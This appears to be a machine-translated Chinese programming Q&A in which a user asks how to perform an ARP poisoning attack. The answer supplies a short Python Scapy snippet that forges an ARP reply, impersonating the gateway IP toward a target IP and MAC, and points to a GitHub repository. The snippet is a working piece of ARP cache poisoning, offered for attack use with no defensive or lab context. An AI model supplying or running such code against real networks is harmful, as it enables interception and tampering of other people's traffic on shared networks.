我想执行ARP中毒攻击,但必须操纵原始数据包的位,有什么办法可以做?因为我尝试了很多,但似乎都没有作用
答案 0 :(得分:-1)
您可以使用python scapy执行arp缓存中毒
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst= target_mac
send(poison_target)
您可以在github上引用此repo。